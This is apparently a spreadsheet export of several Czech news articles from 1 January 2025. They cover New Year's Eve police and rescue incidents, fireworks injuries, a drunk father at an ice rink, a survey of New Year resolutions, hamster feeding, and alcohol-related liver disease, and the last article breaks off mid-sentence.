    <t>Otec s pětiletou dcerou na kluzišti jako „ Dán “! 1. leden 2025 2609 Tak tohleto je opravdu na pár facek! Třiačtyřicetiletý muž si sice během předvánoční neděle splnil otcovský úkol a zavedl svoji pětiletou dceru na kluziště na náměstí T. G. Masaryka . Zatímco ovšem holčičku nechal bruslit samotnou, on sám se více zdržoval u stánku s punčem a dalším alkoholem . Jejich návštěva centra města se pak navíc protáhla až do večerních hodin. Strážníci byli nuceni zavolat matce dítěte, aby si ho přijela vyzvednout. Otec nebyl schopen ani chodit... Titul vzorný otec pravděpodobně nezíská třiačtyřicetiletý muž, který měl v péči svoji pětiletou dceru. „Společně kolem oběda vyrazili bruslit na kluziště v centru města. Venkovní aktivity se jim ale časově prodloužily a domů se vraceli, až po dvacáté hodině večer. Komplikace nastaly ze strany otce, a to díky konzumaci alkoholu ,“ informoval Petr Zapletal, mluvčí Městské policie Prostějov. „Muž byl evidentně pod jeho vlivem, což bylo patrné z jeho stylu chůze. Když dorazili strážníci na místo, provedli u něj orientační dechovou zkoušku s pozitivním výsledkem. Naměřená hodnota dosáhla hranice 3,27 promile alkoholu ,“ upřesnil Petr Zapletal s dovětkem, že tím případ ještě neskončil. „Vzhledem ke stavu otce hlídka telefonicky kontaktovala maminku holčičky, která se nacházela tou dobou v zaměstnání. Matka se následně dostavila na místo události a dceru si převzala. Všechny zjištěné skutečnosti byl oznámeny příslušným orgánům,“ uzavřel mluvčí prostějovských strážníků Petr Zapletal. Anketa Večerníku Pečete si cukroví doma, nebo jej nakupujete? Doma Autor: Michal Kadlec Autor Michal Kadlec Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>20250101_92_3696757833_9040749d236d172af25d.html</t>
  </si>
  <si>
    <t>9040749d236d172af25d</t>
  </si>
  <si>
    <t>Češi si dávají předsevzetí, která pak většinou nedodrží</t>
  </si>
  <si>
    <t>Češi si dávají předsevzetí, která pak většinou nedodrží 1. ledna 2025 110 Zdroj foto: Pexels Více peněz a menší pracovní vytížení, aby měl člověk více volného času. Ten by lidé věnovali rodině, ale také sobě, aby na sobě mohli zapracovat, především na své postavě a fyzičce. Tak by se daly zjednodušeně shrnout výsledky velkého průzkumu zaměřeného na novoroční předsevzetí a životní styl, který pro společnost Pluxee zpracovala agentura Ipsos. Předsevzetí jsou tradicí nejen u nás, ale i v mnoha dalších evropských zemích. Češi však patří mezi národy, kde jsou rozšířená opravdu silně. Dává si je kolem 80 procent lidí, nejčastěji s příchodem nového roku, ukázal aktuální průzkum společnosti Pluxee (dříve Sodexo Benefity), který pro ni zpracovala agentura Ipsos. Předsevzetí rychle vyprchají, ale zaměstnavatelé mohou pomoci Více než polovina (56 %) lidí vůbec předsevzetí nedodrží, anebo vezmou velmi rychlý konec. A někteří si je pro jistotu nedávají vůbec. Celých 41 procent Čechů uvedlo, že překážkou v dodržení cílů je pro ně nedostatek času, 40,5 procenta, že jim na to již nezbývá energie, 28 procent viní přílišné pracovní vytížení a 20,7 procenta přiznalo také nedostatek financí. „Shrnuto krátce, lidem chybí čas kvůli vysokému pracovnímu vytížení. A často také finance,“ konstatuje Tereza Knířová, šéfka komunikace v Pluxee. Od svých zaměstnavatelů by si tak respondenti v drtivé většině (71,9 %) přáli zvýšení mzdy, navýšení stravenek a benefitů pro volný čas. Velká část by si přála i více dovolené a od zaměstnavatele navýšení příspěvku na ni. Zdraví na prvním místě Nejčastěji předsevzetí do roku 2025 směřují do oblasti fyzického zdraví. Skoro třetina respondentů by chtěla zhubnout, více než pětina se chystá pravidelně sportovat, téměř 19 procent lidí si chce zpevnit postavu. S tím úzce souvisí změna stravování, na což se chce v novém roce zaměřit 23 procent respondentů, a také na kvalitní spánek (21,4 %). „Zajímavé je, že hubnutí v předsevzetích vede ve všech věkových kategoriích. Podíl se ale zvyšuje s vyšším věkem. Ve věkové kategorii 55-65 let by tak chtělo zhubnout 35,7 procenta lidí,“ komentuje výsledky průzkumu Tereza Knířová. Pokud jde o pohled ženy versus muži, po štíhlejší postavě touží více ženy (33,2 %) než muži (25,6 %). To vyrýsované svaly jsou pro změnu doménou mladých. Ve věkové kategorii 25-34 let si toto předsevzetí dalo 28,5 procenta respondentů, zatímco ve věkové kategorii 35-54 let je to 18 procent a nad 55 let už jen 12 procent. Na opačný konec spektra se dostalo přání zaměřit se na meditování/mindfulness (6,2 %) a předsevzetí chodit na terapii či koučink (2,2 %). Více relaxace a wellness by si chtělo dopřát necelých 15 procent respondentů. „Přitom v současné náročné době, kdy lidé čelí mnohdy v podstatě permanentnímu stresu a stále více také vyhoření v práci, by si duševní zdraví a celková psychická pohoda zasloužily zcela jistě větší pozornost. Pořád to ale není samozřejmost a je tu pro firmy velký prostor, jak svým lidem pomoci,“ konstatuje Tereza Knířová. Lepší fyzička a hezčí postava Důvod, proč předsevzetím kralují zrovna ta zaměřená na fyzické zdraví, je prostý. Primárním cílem pro téměř 42 procent respondentů je totiž zlepšení fyzické kondice. Následuje přání cítit se lépe ve svém těle (37,5 %), eliminovat zdravotní rizika do budoucna (35,1 %) a získat více energie (33,3 %). Třetina respondentů by pak chtěla zlepšit svoji psychickou pohodu. Značné rozdíly lze u těchto cílů, kterých chtějí lidé dosáhnout, sledovat mezi pohlavími. Zatímco u lepší fyzičky je poměr vyrovnaný, cítit se lépe ve svém těle a mít víc energie chtějí v mnohem větší míře ženy. Například více energie by chtělo mít více než 37 procent žen, ale jen 28,7 procenta mužů. Také po větší psychické pohodě více touží ženy (34,8 %) než muži (26,8 %). Naproti tomu snížit zdravotní rizika do budoucna je cílem pro 40,4 procenta mužů, u žen je to 30 procent. Ve zdravém životním stylu máme co dohánět Z hlediska zdravého životního stylu na tom nejsme příliš dobře. Světová zdravotnická organizace doporučuje pohyb minimálně 30 minut střední intenzity 5krát týdně. To podle průzkumu splňuje pouze 26 % dotázaných. Navíc 23 % Čechů uvedlo, že se takové aktivitě věnuje méně než jednou za týden, což již zvyšuje zdravotní rizika. Frekvence pohybové aktivity se liší podle věku, kdy nejvíce času si na pohyb umí vyhradit lidé ve věkové kategorii 25-34 let, druhá příčka patří věkové kategorii 45-54 let. Méně často si zasportovat vyrazí ti z věkové kategorie 35-44 let. „Dá se předpokládat, že to souvisí i s životními etapami. V době, kdy jsou v rodině malé děti, nezbývá rodičům tolik času pro sebe. Naopak v době, kdy je člověk ještě bez závazků, nebo kdy už má naopak děti odrostlé, se může svým aktivitám věnovat bez větších omezení,“ myslí si Tereza Knířová. Nejčastěji dávají lidé přednost aktivitám, které jsou zdarma, například jdou na procházku či výlet, zaběhají si, vyrazí na kolo nebo si zacvičí doma jógu. Necelá čtvrtina pak cílí i na aktivity, kde musí zaplatit vstupné, členství nebo permanentku. Chodí tak plavat, cvičit do fitness centra, hrát tenis, v zimě jezdí lyžovat. Přiznávají ale, že je to i díky příspěvkům na sport od zaměstnavatele. „V tomto případě je vidět, jak jsou důležité cílené příspěvky na mimopracovní aktivity od zaměstnavatele. Protože bez nich by si někteří lidé na sport finance nevyčlenili,“ dodává Knířová. Zdravě nejíme, alkohol nepijeme Pro zdravý životní styl je důležitá také správná životospráva. Tady je také ještě co dohánět. Nemalá část lidí se totiž dost potýká s pitným režimem, který je nezbytný pro správné fungování těla. Podle průzkumu se ukázalo, že 13,6 procenta respondentů vypije méně než půl litru vody denně, anebo také žádnou. Nejčastěji lidé uváděli, že vypijí mezi 1,1 až 1,5 litru vody denně (26,9 %). „Doporučení odborníků se přitom pohybuje kolem 2 až 2,5 litru denně, což splňuje jen 10,5 procenta dotázaných. Pro mnoho lidí tedy může být právě nový rok ideální příležitostí se v této disciplíně zlepšit,“ říká Tereza Knířová. Podobné je to se zdravým stravováním. Téměř pětina respondentů (19,2 %) přiznala, že se většinou zdravě nestravují, přes 6 procent dokonce, že se nestravují zdravě vůbec. Častěji tento prohřešek přiznávají muži než ženy. Skoro 40 procent dotázaných uvedlo, že se na kvalitu stravování příliš nesoustředí. A zhruba třetina (34,9 %) odpověděla, že si na zdravé stravě dávají opravdu záležet, přičemž se výrazně častěji jedná o ženy. Alkoholu lidé příliš neholdují, nebo to alespoň uvedli v průzkumu. Vůbec ho nepije 27,9 procenta dotázaných, jednou až dvakrát za týden si víno či pivo dá zhruba třetina respondentů. Vysoký podíl těch, kteří alkohol nepijí vůbec nebo jen minimálně, je přitom i mezi mladými lidmi. Jedním z nejdůležitějších pilířů zdravého životního stylu je spánek. Odborníci doporučují pro dospělé ideálně 7 až 9 hodin spánku. Toto rozpětí potvrdilo 67,4 procenta dotázaných v průzkumu. Osobní a pracovní cíle nejsou tolik v kurzu Fyzické zdraví a životní styl ovšem nejsou jedinými oblastmi, na které se lidé ve svých (nejen) novoročních předsevzetích zaměřují, i když o poznání méně často. Například osobní cíle nebo předsevzetí si pro nový rok neplánuje dát více než třetina dotázaných v průzkumu Pluxee, v pracovní oblasti je to dokonce 37,5 procenta. „Pokud už si ale nějaké osobní předsevzetí lidé plánují dát, týká se nejčastěji rodiny a volného času. To opět poukazuje na důležitost work-life balance,“ upozorňuje Tereza Knířová. „A tento trend se jednoznačně promítá také do předsevzetí, která souvisí s prací. Celých 24 procent respondentů by totiž rádo snížilo svůj pracovní stres, 13,8 procenta by chtělo snížit také své pracovní vytížení, aby mělo více času pro sebe a rodinu.“ Vyšší mzdu by chtělo více než 13 procent dotázaných. Jaké články v něm nejraději čtete a které rubriky Vás nejvíce zajímají? Jiná témata – legislativa, zprávy, názory na diskutovaná témata (50%) Autor: Markéta Grulichová Autor person Markéta Grulichová</t>
  </si>
  <si>
    <t>20250101_93_3696911787_6a2657ad8fecaf8acee1.html</t>
  </si>
  <si>
    <t>6a2657ad8fecaf8acee1</t>
  </si>
  <si>
    <t>Jak a čím správně krmit vašeho domácího křečka?</t>
  </si>
  <si>
    <t>Jak a čím správně krmit vašeho domácího křečka? Od Redakce Kategorie: Zvířata Výživa vašeho křečka je velmi důležitá pro jeho zdraví, dlouhověkost a vitalitu. Správný výběr potravy a její vhodné dávkování zajistí, že váš malý mazlíček bude nejen spokojený, ale také v dobré kondici. V tomto článku vám představíme základní pravidla pro krmení křečků, vhodné druhy potravy a důležité tipy, na co si dát pozor. Základy výživy křečka Křečci jsou malí hlodavci, kteří ve volné přírodě konzumují pestrou škálu potravin – od semínek přes ovoce a zeleninu až po malé živočichy. Základem jejich stravy v domácím prostředí by mělo být krmivo, které se co nejvíce přibližuje přirozené stravě. Hlavním pilířem jídelníčku by měly být směsi semen, obilovin a luštěnin, které jsou specificky navrženy pro křečky. Tyto směsi často obsahují správné množství bílkovin, tuků a sacharidů, což je důležité pro zdravý růst a fungování organismu vašeho křečka. Je důležité si uvědomit, že ne všechny směsi dostupné v obchodech jsou stejné kvality. Při výběru krmiva pro vašeho křečka vždy dbejte na to, aby směs neobsahovala nadměrné množství cukru nebo tuku. Křečci, zejména někteří druhy jako křeček džungarský, jsou náchylní k obezitě a cukrovce, proto je důležité jejich stravu pečlivě sledovat. Jaké potraviny jsou vhodné pro křečka? Kromě základní směsi semen můžete do stravy vašeho křečka zahrnout i další druhy potravy, které mu dodají potřebné vitamíny a minerály. Patří sem například čerstvé ovoce a zelenina. Nicméně je důležité vybírat takové druhy, které nejsou pro křečka škodlivé. Mezi bezpečné ovoce a zeleninu patří: Mrkev – bohatá na vitamíny, zejména betakaroten. Jablka – obsahují vitamín C a vlákninu, ale vždy bez jadérek, které mohou obsahovat jedovaté látky. Okurka – má vysoký obsah vody, což je vhodné zejména v horkých dnech. Paprika – zdroj vitamínu C a antioxidantů. Hroznové víno – malé množství jako pochoutka, ale pozor na vysoký obsah cukru. Kromě ovoce a zeleniny můžete křečkovi občas nabídnout i bílkovinné složky potravy, jako jsou vařená vejce, vařené kuřecí maso nebo speciální hmyz pro hlodavce (např. moučné červy). Tyto potraviny jsou důležité zejména pro křečky v růstu nebo pro březí samičky. Co křečkům rozhodně nedávat? Stejně jako existuje mnoho potravin, které jsou pro křečka vhodné, existuje i mnoho těch, kterým je třeba se vyhnout. Některé potraviny mohou být pro křečky dokonce jedovaté. Mezi ty nejnebezpečnější patří: Citrusy – vysoký obsah kyselin může způsobit zažívací problémy. Cibule a česnek – obsahují látky, které jsou toxické pro křečky. Syrové brambory – obsahují solanin, který je pro křečky jedovatý. Avokádo – obsahuje persin, který je nebezpečný pro většinu domácích mazlíčků. Čokoláda – podobně jako u psů, je i pro křečky čokoláda vysoce toxická. Dále je důležité omezit množství sladkých a tučných potravin, které mohou vést k obezitě a dalším zdravotním komplikacím. Křečci mají velmi citlivý trávicí systém, proto je třeba dbát na pestrou, ale zároveň vyváženou stravu. Jak často a kolik krmit? Jednou z nejdůležitějších otázek při krmení křečka je frekvence a množství potravy. Křečci mají tendenci schraňovat si potravu do svých lícních vaků a poté ji uschovat v různých částech klece. Proto se může zdát, že váš křeček neustále jí. Ve skutečnosti ale křeček potřebuje jen malé množství potravy denně. Doporučená denní dávka potravy se liší podle velikosti a druhu křečka, ale obecně platí, že by dospělý křeček měl dostat přibližně jednu až dvě polévkové lžíce směsi denně. Ovoce a zeleninu je nejlepší podávat v malých porcích několikrát týdně, aby nedocházelo k přejídání. Pokud jde o vodu, křeček by měl mít neustále přístup k čerstvé a čisté vodě. Použití napáječky je praktické, protože zabraňuje rozlití vody a kontaminaci steliva. Vodu v napáječce je třeba měnit každý den, aby byla vždy čerstvá. Tipy na zdravé mlsání I když by hlavní část jídelníčku měla tvořit směs semen a obilovin, není od věci občas křečka odměnit něčím zvláštním. Zdravé mlsání může zahrnovat malé množství ořechů (nesolených a nepražených), slunečnicová semínka nebo speciální pamlsky pro křečky, které lze zakoupit ve zverimexech. Nicméně je důležité dávat pamlsky s mírou. Nadměrná konzumace kalorických potravin může vést k obezitě a dalším zdravotním problémům, proto by pamlsky měly tvořit maximálně 10 % celkového příjmu potravy. Závěr: sledujte zdraví svého křečka Správná výživa je jedním z nejdůležitějších aspektů péče o křečka. Pokud si nejste jisti, zda váš křeček dostává všechno, co potřebuje, nebo pokud si všimnete změn v jeho chování, váze či vzhledu, neváhejte se obrátit na veterináře. Pravidelná kontrola hmotnosti, stavu srsti a zubů může odhalit problémy včas a umožnit vám zasáhnout dříve, než bude pozdě. Pamatujte, že každý křeček je jedinečný a může mít jiné potřeby. Proto se snažte přizpůsobit jeho stravu tak, aby odpovídala jeho věku, zdravotnímu stavu a aktivitě. Vyhledávání Autor: Redakce Rubrika transition_slide Zvířata</t>
  </si>
  <si>
    <t>6</t>
  </si>
  <si>
    <t>20250101_94_3696739905_c81da80212396bb17592.html</t>
  </si>
  <si>
    <t>c81da80212396bb17592</t>
  </si>
  <si>
    <t>Silvestr byl pro záchranáře klidnější. Pyrotechnika zavinila dvě lehčí zranění</t>
  </si>
  <si>
    <t>Silvestr byl pro záchranáře klidnější. Pyrotechnika zavinila dvě lehčí zranění Závěr roku v Plzeňském kraji se obešel bez mimořádných událostí pro všechny složky IZS. „Během noci jsme přijali množství oznámení, která se týkala zejména případů osob pod vlivem alkoholu . Jinak situace v dopravě bez vážné dopravní nehody,“ uvedla za policii mluvčí Michaela Raindlová. Klidnější než v předchozích letech byl závěr roku i pro záchranáře. „Výjezdy, které byly spojené s vítáním nového roku, nebyly tak závažné a bylo jich kolem dvaceti. Úrazy způsobené pyrotechnikou jsme zaznamenaly pouze dva, a to lehčího charakteru. Další události, typu úrazy v opilosti či napadení, se pohybovaly v jednotkách a za asistence Policie ČR,“ informovala bez dalších podrobností za záchrannou službu Andrea Divišová. play_fill Plzeňsko Hasiči vyjížděli hlavně k technickým zásahům a požárům popelnic a odpadu způsobených většinou pyrotechnikou. V Železné Rudě na Klatovsku od ní chytlo logo na bowlingu, hasiči ale nakonec zasahovat nemuseli, požár byl uhašen ještě před jejich příjezdem. Autor: Zdeněk Sequens Autor person Zdeněk Sequens</t>
  </si>
  <si>
    <t>20770</t>
  </si>
  <si>
    <t>24370</t>
  </si>
  <si>
    <t>20250101_95_3696723236_6c822989db33c86a8858.html</t>
  </si>
  <si>
    <t>6c822989db33c86a8858</t>
  </si>
  <si>
    <t>Loupež i napadení a vyhrožování s nožem v ruce. I takový byl silvestr jihomoravských policistů</t>
  </si>
  <si>
    <t>Loupež i napadení a vyhrožování s nožem v ruce. I takový byl silvestr jihomoravských policistů Foto: ilustr foto, Týdeník Policie Jihomoravský kraj Od 18 do 6 hodin ráno řešili policisté celkem 232 událostí. Převážně se jednalo o partnerské neshody, drobné potyčky a napadení, které se po půlnoci přesunuly i do ulic. Policisté asistovali při několika požárech, ať už obalů od pyrotechniky, keřů, stromů či obytných prostor. Spolu s hasiči řešíme asi nejzávažnější požár, který vypukl na Silvestra ve Střelicích. Došlo tam k zahoření dřeva nachystaného na spálení u kotle. Škoda je odhadnuta na 250 tisíc korun. Nikdo nebyl zraněn. Z výtržnictví a ublížení na zdraví se budou zodpovídat i dva muži, kteří v Dubňanech napadli při oslavách několik osob. Podezřelá z trestného činu loupež je žena z Břeclavska, která napadla svého známého a odcizila mu peněženku. Starší muž skončil se zraněními v nemocnici, podezřelou dohledala a se souhlasem státního zástupce zadržela policejní hlídka. O moc lépe se nevedlo mladému muži, který krátce po půlnoci na Moravském náměstí v Brně napadl svou expřítelkyni a s nožem v ruce vyhrožoval její kamarádce, která se jí snažila na zemi pomoci. Vzápětí skončil v moci policistů a na služebně. Je podezřelý z výtržnictví a nebezpečného vyhrožování. Ještě před půlnocí nezvládl jízdu na jednokolce v ulici Radlas mladý student, nedal přednost a střetl se s autobusem. Naštěstí vyvázl pouze se zraněním. Deset zraněných při manipulaci s pyrotechnikou (Michaela Bothová, ZZS JMK) Do půlnoci byl relativní klid, pak však začal počet událostí narůstat. Do šesti hodin ráno jsme jich zaznamenali zhruba osm desítek, což je srovnatelné s předchozími roky. Pro lepší kontext: v běžných dnech evidujeme za stejný čas přibližně dvě až tři desítky zásahů. Postarali jsme se – kromě standardních výjezdů -. ve větší míře o pacienty s otravou alkoholem , ale také o ty, kteří po požití většího množství alkoholu upadli a způsobili si úraz. V těchto případech mohlo svoji roli sehrát i náledí. V péči jsme měli také pacienty, kteří se zúčastnili různých potyček. Postarali jsme se i o osoby, které si zranily obličej nebo ruce při manipulaci s pyrotechnikou, byla jich přibližně desítka. Evidovali jsme také několik dopravních nehod, i zde mohlo mít vliv náledí. Po páté hodině ranní pak dispečink vyslal záchranářskou posádku do brněnského Starého Lískovce , naši zdravotníci přímo v sanitce pomohli při překotném porodu na svět zdravé holčičce. Když na místo přijel i lékařský tým, pomohl s ošetřením miminka a maminky. Obě pak sanitka převezla ke kontrole do porodnice. Děkujeme kolegyním a kolegům, kteří slouží v nepřetržitém provozu a starají se o ty, co nás potřebují. mjr. Pavel Šváb Policie ČR Pátrání po osobách Pátrání po vozidlech Nábor k Policii ČR Nábor k Celní správě ČR Nábor k Vězenské službě ČR COPYRIGHT © 2025 TÝDENÍK POLICIE. BEZ PÍSEMNÉHO SOUHLASU REDAKCE JE PŘÍSNÝ ZÁKAZ UŽÍVÁNÍ ZDE ZVEŘEJNĚNÝCH MATERIÁLŮ. PROVOZOVATELEM SERVERU JE BC. MONIKA JAŇURKOVÁ, SE SÍDLEM VĚSTONICKÁ 432/2, 15521, PRAHA - ZLIČÍN. IČ 04518900 ZAPSANÁ V ŽIVNOSTENSKÉM REJSTŘÍKU. NEJEDNÁ SE O OFICIÁLNÍ STRÁNKU POLICIE ČESKÉ REPUBLIKY . Autor: Pavel Šváb Autor person Pavel Šváb</t>
  </si>
  <si>
    <t>20250101_96_3696748436_3d9c7d7f53fcbc478cfe.html</t>
  </si>
  <si>
    <t>3d9c7d7f53fcbc478cfe</t>
  </si>
  <si>
    <t>Nemoci jater zabíjejí dříve muže než ženy: Co za tím je?</t>
  </si>
  <si>
    <t>Nemoci jater zabíjejí dříve muže než ženy: Co za tím je? info Profimedia Wanda Markovičová 1. 1. 2025 clock 3 minuty video Cirhóza jater patří mezi deset nejčastějších nemocí, na kterou Češi umírají. Ročně jí zaplatí životem 2000 lidí. Zatímco v dřívějších dobách byla diagnóza „tvrdnutí jater“ spíše mužskou záležitostí, v poslední době se týká i žen. Důvody tohoto závažného onemocnění jsou různé. Způsobuje ji hepatitida typu C, B, B +D, ale také obezita. Jejím důsledkem je ztučnění jater a stav zvaný steatóza, který cirhóze předchází. Nejčastějším důvodem této nemoci ale bývá nadměrná konzumace alkoholu … Autor videa Andrew Huberman vám vysvětlí, co alkohol dělá s vaším tělem. Více na kanále YouTube.com. Zdroj: Youtube Kdy už jde do tuhého... Kdo je alkoholik a kdo jen „sváteční pijan“? Na tuto otázku je někdy těžké odpovědět. Nicméně pravdou je, že každodenní pití byť menšího počtu lihovin, je velmi rizikové. „Když žena vypije dva různé alkoholické nápoje denně, je to na pováženou. Ženské tělo je totiž křehčí a na alkohol reaguje velmi citlivě,“ varuje odborník s tím, že i u mužů, kteří jsou vůči „ohnivé vodě“ více rezistentní, existuje jasně daný limit tří nápojů. Jakmile někdo denně do sebe „zalomí“ pět piv , už je to aspirant na cirhózu jater. Zádrhel je v psychice Alkohol je sice metla lidstva, ale lidé se k němu často obrací jako k útěše a útěku před problémy. Podle odborníků je ale psychická odolnost mužů a žen diametrálně odlišná. „Ženy jsou psychicky stabilnější a silnější než muži. Také daleko snáze se aklimatizují na změny a dokážou zpracovat lépe takové životní „jobovky“ jako je rozchod nebo ztráta zaměstnání,“ říká psycholog. Muži splín řeší alkoholem Muži jsou odjakživa vedeni k tomu, aby byli silní, rozhodní a všechno zvládali sami. To je pak důvod, proč všechny svoje emoce v sobě dusí.. Ženy to mají opačně – ať se u nich naskytne jakýkoliv problém, už volají kamarádce, aby se mohly vypovídat. A to jim podle odborníků hodně zachraňuje život. Psychická (ne)pohoda má na pití alkoholu velký vliv a v případě mužů je to berlička, po které často sahají. Související články video Stres a alkohol zabíjí Podle odborníků je tu ještě – kromě alkoholu – jeden ničivý element, který nemoc spolehlivě spouští. Je to stres. Tento neviditelný zabiják játra ničí podobným způsobem jako alkohol . V případě mužů, kteří ho špatně snáší, se toto nebezpečí ještě zdvojnásobuje. „U žen stres spouští úzkost, ale u mužů to jde vyloženě do psychického propadu, který často končí u sklenek alkoholu ,“ říká lékař. close Alkohol má duševní bolest utišit, ale ve skutečnosti ji ještě znásobuje. Špatné konce... Muži jsou tedy vůči jaterním onemocněním daleko křehčí než ženy. Bohužel, většina z nich své zdraví moc neřeší a preventivní prohlídky nenavštěvují. Proto se stává, že cirhózu jater zjistí, až když už je pozdě. „Problémem cirhózy totiž je, že v počátečních stádiích nebolí. Pak se začne projevovat formou nevolnosti, nadýmání a nechuti k jídlu. V pozdějším stádiu už nemoc udeří vší silou a následky jsou fatální. Od zvracení krve, poškození mozku, až po demenci a agresivní chování. Nemoc se bohužel nedá léčit. Jedinou šancí je transplantace jater, na kterou ale už leckdy bývá pozdě.</t>
  </si>
  <si>
    <t>20250101_97_3696709206_7322433fc0c69038e477.html</t>
  </si>
  <si>
    <t>7322433fc0c69038e477</t>
  </si>
  <si>
    <t>A je to za námi. Noční pyrotechnický maraton trhal prsty i&amp;nbsp;letos</t>
  </si>
  <si>
    <t>A je to za námi. Noční pyrotechnický maraton trhal prsty i&amp;nbsp;letos A je to za námi. Noční pyrotechnický maraton trhal prsty i letos Noční odpalování petard opět zaměstnávalo složky IZS. Je taková zábava zapotřebí? O tom, že je Silvestr v podstatě obyčejný den, jsem psal v tomto článku , v němž jsem se mimo jiné pozastavoval nad způsobem zábavy spojené s pyrotechnikou. Vysloužil jsem si tak mnoho negativních komentářů. Zkrátka někteří divokou oslavu posledního dne v roce milují, jiní se raději zdrží doma nebo někde v poklidu s rodinou. Někteří ale musí do práce, aby zachraňovali zdraví, životy a majetek či udržovali v chodu důležitou infrastrukturu. U nás „jen“ tržná zranění, v Německu i mrtví Na můj vkus je silvestrovská veselice s petardami a rachejtlemi zbytečně vyhrocená. Nestačí jen hluk, křik opilců a smrad z petard. Jedni se sice baví, jiní trnou, co se stane. Silvestr je noční můrou příslušníků IZS. Letos naštěstí nikdo v Česku na následky silvestrovského veselí nezemřel, v Německu ale přišlo o život v důsledku manipulace s pyrotechnikou pět lidí. V Praze policisté až do půlnoci neřešili nic vážného. „Nicméně krátce po půlnoci a to během velmi krátké chvíle rapidně vzrostla oznámení na tísňovou linku 158. Ta se týkala především menších požárů a velkého množství potyček, konfliktů, a to na celém území hlavního města a dalších mnoha událostí spojených s pitím alkoholu ,“ uvedla v tiskové zprávě policejní mluvčí Eva Kropáčková. Během noci bylo v Praze ve speciálu GOLEM ošetřeno celkem 27 pacientů, z nichž 13 bylo transportováno do zdravotnického zařízení. Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra. Rušno bylo i ve zbytku republiky. Hasičská služba ČR v postu na síti X uvádí, že služba na přelomu starého a nového roku patří k těm náročnějším, a ani včerejší noc nebyla výjimkou. Vyráželi k 827 událostem, z toho řešili 357 požárů, což je vůbec největší počet za posledních 7 let, přičemž častým důvodem byla pyrotechnika. K závažnému zranění v souvislosti se špatnou manipulací s pyrotechnikou vyráželi záchranáři v Mostu . Muž skončil s těžkým poraněním v ústeckém tramacentru v umělém spánku a následky si podle iDnes ponese celý život. Muž přišel o prsty a část dlaně. Záchranáři pak evidují další případy poraněných rukou, popálenin či tržných zranění kvůli pyrotechnice. Opravdu mají dospělí zapotřebí střílet rachejtle? Potřebujeme takového Silvestra? Je nutné zatěžovat záchranáře primitivní hlučnou zábavou? A má takový průběh noci něco společného se zábavou? U nás na maloměstě se v ulici odpalovalo už od odpoledne. Nejšílenější byla skupinka lidí, mezi nimiž byla mladá maminka s kočárkem. Ohňostroj měli sice hezký, ale nevím, jak mohli malé dítě vystavovat takovému hluku. O dvě hodiny později projížděla stejným místem za někým sanitka. Regulace odpalování pyrotechniky je podle mne na místě už řadu let. Jak se ale ukazuje na případech z Německa , kde smrtelná a vážná zranění způsobila buď podomácku vyráběná pyrotechnika a nebo dovezená , lidé zřejmě budou riskovat i nadále tak, jako třeba riskují nebezpečnou jízdou na silnicích. Zábava by se samozřejmě neměla jakkoliv zakazovat nebo regulovat. Ale všeho by mělo být s mírou, a pokud takový koníček zatěžuje nebo obtěžuje jiné a vede k ošklivým zraněním, měli by se notoričtí odpalovači pyrotechniky zamyslet nad tím, zda přeci jen nejde o zábavu tak trochu dětinskou.</t>
  </si>
  <si>
    <t>20250101_98_3696690347_08e390c9f06b7e4a486c.html</t>
  </si>
  <si>
    <t>08e390c9f06b7e4a486c</t>
  </si>
  <si>
    <t>Silvestr v Moravskoslezském kraji se oproti minulým letům nijak nevymykal. Policisté řešili poškozené auto po explozi zábavní pyrotechniky</t>
  </si>
  <si>
    <t>Silvestr v Moravskoslezském kraji se oproti minulým letům nijak nevymykal. Policisté řešili poškozené auto po explozi zábavní pyrotechniky Foto: ilustr foto, Týdeník Policie Moravskoslezský kraj Z pohledu bezpečnosti a veřejného pořádku nezaznamenali moravskoslezští policisté na přelomu roku mimořádnou nebo výjimečnou událost. Co do řešených událostí a hovorů na tísňovou linku 158, nejexponovanější čas byl od půlnoci do jedné hodiny ranní. Do silvestrovské půlnoci byl relativní „klid před bouří“, tedy žádný razantní nárůst přijatých oznámení na linku 158 nebo událostí, které by policisté řešili oproti běžnému dni. Situace se jako každoročně změnila úderem půlnoci. Pro představu: policisté řeší v průběhu roku za den přes 300 věcí, přičemž za prvních pět hodin roku letošního bylo zhruba 210 těchto výjezdů a reakcí. Rekordmanem byla první hodina – policisté řešili 75 událostí. Počet hovorů na tísňovou linku 158 je samozřejmě o poznání vyšší, v některých chvílích může býti až dvojnásobný, ale ne vše oznámené patří k řešení policii, anebo k jedné věci přijmou operátoři tísňové linky 158 na operačním středisku více hovorů. Spektrum oznámených věcí bylo opravdu široké. Policisté řešili případy výtržností i narušení veřejného pořádku, zaznamenali jsme fyzická napadání, jak v bytech, barech, restauracích i ve venkovním prostředí. Asi nepřekvapí, že v mnoha případech hrál svou roli alkohol . Máme hlášeny skutky majetkové, dále například i ztrátu všech dokladů. Kolem půlnoci a v prvních chvílích nového roku si prim v oznámeních na linku 158 držela jednoznačně volání ohledně rušení nočního klidu a používání pyrotechniky. Policisté řešili samozřejmě část událostí v úzké součinnosti se zdravotníky, hasiči a strážníky městské policie – ať šlo o oblast veřejného pořádku, oznámení o podnapilých osobách, zahoření či škody způsobené pyrotechnikou. Konkrétněji, asistovali jsme hasičům u několika desítek zahoření například popelnic, krabic od petard, živých plotů a tújí od rachejtlí. Vyjeli jsme také dnes kolem půl jedné ráno do Ostravy – Poruby , kde měla pod zaparkovaným vozidlem explodovat petarda a bylo vidět zadýmení. Na místě zasahovali právě kolegové hasiči. Automobil má poškození ve spodní části. Policisté se událostí zabývají. Kolegům z městské policie jsme zase předávali několik oznámení typu nález opuštěného psa nebo informaci o psovi, který spadl do díry a uvízl v ní. S kolegy zdravotníky zase policisté řešili případy, u kterých došlo ke zranění osob. Zaznamenali jsme i zranění v souvislosti s používáním pyrotechniky. Dnes zhruba čtvrt hodiny po půlnoci se rozhodl ani ne dvacetiletý muž oslavit v Havířově příchod nového roku zábavní pyrotechnikou. Když po zapálení knotu nedošlo k explozi, měl se pokusit o opětovné zapálení. V té chvíli došlo k explozi. Muž byl se zraněním v oblasti hlavy předán zdravotníkům. Nemělo by se jednat o závažné poranění. Mladík zřejmě nerespektoval pokyny z návodu na použití, nedbal opatrnosti při manipulaci s pyrotechnikou. Policisté vyjížděli na oznámení o různých fyzických konfliktech mezi vícero osobami, ať v sousedních bytech anebo venku. V mnoha případech se jednalo jen o hlasitější „párty“. Každopádně děkujeme za vaši všímavost. I díky ní se policisté dozvěděli o „podivném“ muži, který měl v Ostravě – Porubě zhruba hodinu před půlnocí venku pobíhat zcela 